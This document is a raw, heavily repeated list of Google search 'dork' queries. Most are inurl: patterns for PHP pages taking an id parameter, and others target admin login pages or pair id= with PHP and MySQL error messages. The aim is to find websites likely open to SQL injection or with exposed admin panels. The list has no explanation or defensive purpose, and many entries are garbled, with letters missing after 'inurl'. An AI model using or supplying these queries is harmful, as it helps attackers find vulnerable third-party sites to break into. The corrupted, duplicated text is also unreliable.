inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=